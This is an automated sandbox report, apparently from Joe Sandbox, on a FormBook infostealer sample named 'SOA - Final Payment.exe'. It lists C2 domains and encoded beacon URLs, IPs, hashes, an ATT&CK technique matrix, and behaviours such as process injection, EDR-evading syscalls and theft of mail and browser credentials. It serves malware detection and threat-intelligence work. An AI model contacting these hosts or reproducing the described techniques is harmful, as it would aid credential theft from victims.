                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture3
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612352 Sample: SOA - Final Payment.exe Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 35 www.physicsbrain.xyz 2->35 37 www.bydotoparca.net 2->37 39 2 other IPs or domains 2->39 45 Antivirus detection for URL or domain 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 Yara detected FormBook 2->49 53 5 other signatures 2->53 10 SOA - Final Payment.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 35->51 process4 file5 33 C:\Users\user\...\SOA - Final Payment.exe.log, ASCII 10->33 dropped 65 Injects a PE file into a foreign processes 10->65 14 SOA - Final Payment.exe 10->14         started        17 SOA - Final Payment.exe 10->17         started        19 SOA - Final Payment.exe 10->19         started        signatures6 process7 signatures8 69 Maps a DLL or memory area into another process 14->69 21 6UCrnFl0sVXS7jZvJ.exe 14->21 injected process9 signatures10 55 Found direct / indirect Syscall (likely to bypass EDR) 21->55 24 secinit.exe 13 21->24         started        process11 signatures12 57 Tries to steal Mail credentials (via file / registry access) 24->57 59 Tries to harvest and steal browser information (history, passwords, etc) 24->59 61 Modifies the context of a thread in another process (thread injection) 24->61 63 3 other signatures 24->63 27 6UCrnFl0sVXS7jZvJ.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 natroredirect.natrocdn.com 85.159.66.93, 49981, 49982, 49983 CIZGITR Turkey 27->41 43 www.physicsbrain.xyz 13.248.169.48, 49979, 80 AMAZON-02US United States 27->43 67 Found direct / indirect Syscall (likely to bypass EDR) 27->67 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SOA - Final Payment.exe62%VirustotalBrowse
                SOA - Final Payment.exe59%ReversingLabsWin32.Backdoor.FormBook
                SOA - Final Payment.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.bydotoparca.net100%Avira URL Cloudmalware
                http://www.bydotoparca.net/s3u9/?4J=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEmvApV4bOCL+NdTgdCFBJIAA/S51Hhw==&pd=qdUp100%Avira URL Cloudmalware
                http://www.physicsbrain.xyz/i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUp100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.t-msedge.net
                		13.107.246.45
                		truefalse
                  		high
                  www.physicsbrain.xyz
                  		13.248.169.48
                  		truefalse
                    		high
                    natroredirect.natrocdn.com
                    		85.159.66.93
                    		truefalse
                      		high
                      www.bydotoparca.net
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.bydotoparca.net/s3u9/false
                          		high
                          http://www.physicsbrain.xyz/i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.bydotoparca.net/s3u9/?4J=UzjCSVSddvdCY8C2KpgECGgzR3gby2SVeHfhkJM3nHWcSpz3gZ2Mu5mgzC51fDOgl0cc0ISzjbohHF66d8TEmvApV4bOCL+NdTgdCFBJIAA/S51Hhw==&pd=qdUpfalse
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabsecinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icosecinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.bydotoparca.net6UCrnFl0sVXS7jZvJ.exe, 0000000B.00000002.2608255794.0000000004FC0000.00000040.80000000.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsecinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.ecosia.org/newtab/secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=secinit.exe, 0000000A.00000003.1939912521.0000000007C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            13.248.169.48
                                            		www.physicsbrain.xyzUnited States
                                            		16509AMAZON-02USfalse
                                            85.159.66.93
                                            		natroredirect.natrocdn.comTurkey
                                            		34619CIZGITRfalse

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1612352
                                            Start date and time:2025-02-11 18:41:13 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 15s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:14
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:SOA - Final Payment.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@11/2@2/2
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 93%
                                            • Number of executed functions: 110
                                            • Number of non-executed functions: 265
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.19.244.127, 20.109.210.53
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:42:06API Interceptor2x Sleep call for process: SOA - Final Payment.exe modified
                                            12:43:19API Interceptor1340864x Sleep call for process: secinit.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            13.248.169.48BINATONE LLC RFQ.Vbs.vbsGet hashmaliciousFormBookBrowse
                                            • www.meacci.xyz/ieqn/
                                            REVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                            • www.gnolls.xyz/d6sm/
                                            JJ0tnjLiDS.exeGet hashmaliciousFormBookBrowse
                                            • www.bitcoinvendor.xyz/1lt7/
                                            QCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                            • www.autonomousrich.xyz/5l58/
                                            crypt.exeGet hashmaliciousFormBookBrowse
                                            • www.brothersharetender.xyz/rbx9/
                                            Purchase Order No. STPL014724.exeGet hashmaliciousFormBookBrowse
                                            • www.prepaidbitcoin.xyz/yz57/
                                            Updated 2025 Trading Agreement for Direct Purchase.exeGet hashmaliciousFormBookBrowse
                                            • www.shibbets.xyz/r026/
                                            Confirmation Receipt for ETF_20250211_HSBCEU314AX51920DEU.vbeGet hashmaliciousFormBookBrowse
                                            • www.hotethereum.xyz/t7vo/
                                            06OJsSI8WG.exeGet hashmaliciousFormBookBrowse
                                            • www.satoshichecker.xyz/2inw/
                                            INV-20250210.vbsGet hashmaliciousFormBookBrowse
                                            • www.nakaligtas.xyz/lcrb/
                                            85.159.66.93REVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                            • www.bydotoparca.net/q8ji/
                                            QCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                            • www.bydotoparca.net/s3u9/
                                            AWB114.exeGet hashmaliciousFormBookBrowse
                                            • www.magmadokum.com/fo8o/
                                            SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                            • www.bydotoparca.net/s3u9/
                                            SOA-CAVER.exeGet hashmaliciousFormBookBrowse
                                            • www.bydotoparca.net/s3u9/
                                            Outanding payment Paid.exeGet hashmaliciousFormBookBrowse
                                            • www.bydotoparca.net/q8ji/
                                            PO490102808.exeGet hashmaliciousFormBookBrowse
                                            • www.letsbookcruise.xyz/coi2/
                                            110501.exeGet hashmaliciousFormBookBrowse
                                            • www.tabyscooterrentals.xyz/2rw4/
                                            Purchase Order.htaGet hashmaliciousFormBookBrowse
                                            • www.arwintarim.xyz/sfqx/
                                            PO#910663595.exeGet hashmaliciousFormBookBrowse
                                            • www.arwintarim.xyz/2kkr/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            www.physicsbrain.xyzQCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            SOA-CAVER.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            DHL.Vbs.vbsGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            BJKzw4jO7c.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            PAYMENT.jsGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            Gd3lOevK672JYIK.zip.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            PAYMENT.jsGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            Payment slip.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 13.248.169.48
                                            REQUIS_SP_DAR_0125L.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            natroredirect.natrocdn.comREVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            QCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            AWB114.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            SOA-CAVER.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            Outanding payment Paid.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            PO490102808.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            110501.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            Purchase Order.htaGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            PO#910663595.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            s-part-0017.t-0009.t-msedge.net#U0395#U03a1#U0395#U03a5#U039d#U0391.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            TT COPY.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            Quotation.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            #U0395#U03a1#U0395#U03a5#U039d#U0391.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            TT COPY.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            https://efaa-access5baf12d94e0c4cbbb7599873c26f8afb.powerappsportals.com/Get hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            INQ Q25LSS0168.docxGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            InvNo.248770.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            #U0395#U03a1#U0395#U03a5#U039d#U0391.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CIZGITRREVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            QCX ender user 2025.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            AWB114.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            SOA - Final Payment.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            SOA-CAVER.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            Outanding payment Paid.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            PO490102808.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            110501.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            Purchase Order.htaGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            PO#910663595.exeGet hashmaliciousFormBookBrowse
                                            • 85.159.66.93
                                            AMAZON-02USBINATONE LLC RFQ.Vbs.vbsGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            http://d1xkzbyjtghizd.cloudfront.netGet hashmaliciousUnknownBrowse
                                            • 18.245.78.138
                                            REVISED PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            JJ0tnjLiDS.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            https://tsa.formaloo.co/pv4hi3Get hashmaliciousHTMLPhisherBrowse
                                            • 54.231.128.248
                                            https://click.mailchimp.com/track/click/30010842/forms.office.com?p=eyJzIjoiUU5MTE43blNUdEQxbUdOR3lwdVJ3M1kyVHBzIiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2Zvcm1zLm9mZmljZS5jb21cXFwvUGFnZXNcXFwvU2hhcmVGb3JtUGFnZS5hc3B4P2lkPWkwYWxtWEtzYWtDTnNoUThad2JsWnVHaXRELXJkRk5MbngxZkVDU0RBUGRVT1VWWE9WSTJUa0ZNVFRaSU1EUldUa2RZVmtWSlEwczBVUzR1JnNoYXJldG9rZW49cWhZMVVQRWtyM0NGdjJpcUlpTUtcIixcImlkXCI6XCIzYjUxMDE1ZDY0ODc0ZDdkOWMwNjg2OGM5Y2M5OWVjOFwiLFwidXJsX2lkc1wiOltcIjVkMTg5YTdhMzU1NWIyZWQ5ZjBlNmQ4ZTM3MWFjZmM1ZDE4NzMwYmRcIl19In0Get hashmaliciousHTMLPhisherBrowse
                                            • 76.223.125.47
                                            kHWCtJ64Z2.elfGet hashmaliciousAvailable For TrialBrowse
                                            • 54.171.230.55
                                            Owari.mips.elfGet hashmaliciousUnknownBrowse
                                            • 108.150.151.189
                                            https://r.bgroupusportugal.pt/redirect.php?disp=morta_ans11_10-02_20_50000&idc=1&email=uuser@wpb.org&mode=resetPassword&oobCode=fA9TMT-qLiJF54BFl3bAmwEgjXEBn69dwNFjpDzVlzcAAAGU8a8rwg&apiKey=AIzaSyD3eywpo5yGXrXV5Eo__cDlhXtgd0VYeNc&lang=enGet hashmaliciousUnknownBrowse
                                            • 52.49.16.156
                                            Owari.sh4.elfGet hashmaliciousUnknownBrowse
                                            • 18.138.65.20

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOA - Final Payment.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\SOA - Final Payment.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            C:\Users\user\AppData\Local\Temp\472E1186

                                            Download File
                                            Process:C:\Windows\SysWOW64\secinit.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                            Category:dropped
                                            Size (bytes):196608
                                            Entropy (8bit):1.1221538113908904
                                            Encrypted:false
                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                            MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                            SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                            SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                            SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.767473361742161
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:SOA - Final Payment.exe
                                            File size:782'336 bytes
                                            MD5:070cf235938777838e7c55c9f0c02993
                                            SHA1:e32f0362867403655ca9ba219b40d453fd9ad096
                                            SHA256:004d0b8aa2bc2236e124fceddc2ef21c091678fc622d6bce5ed02292b0b971e4
                                            SHA512:2e2200abf652e3b0a8fa477322414192c54a203cedc35a3bc6d171eb680b2179ef66d4a92ce40fee54ce12448ebfd5e8fc472c5bc38a73896023afbf9196327c
                                            SSDEEP:12288:TRIAbZWUBjuxfrUxcbETuRF9VUqEnEqug+A6Fi3zzeeUsKk5imCXyCbg:THbYUwxfrUxpsFMdE4+A6Fi3mePKk5i9
                                            TLSH:A3F4F1C43B26A706DD691B309A35EDF567B81DACB000B8E25ECE3B57B9AC2115D1CF42
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.g..............0.................. ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash:bfdbd0a493925a25

                                            Static PE Info

                                            General

                                            Entrypoint:0x4bf0ba
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x67A971A5 [Mon Feb 10 03:25:25 2025 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add dword ptr [eax], eax
                                            add byte ptr [eax], al
                                            add al, byte ptr [eax]
                                            add byte ptr [eax], al
                                            add eax, dword ptr [eax]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbf0680x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x1864.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
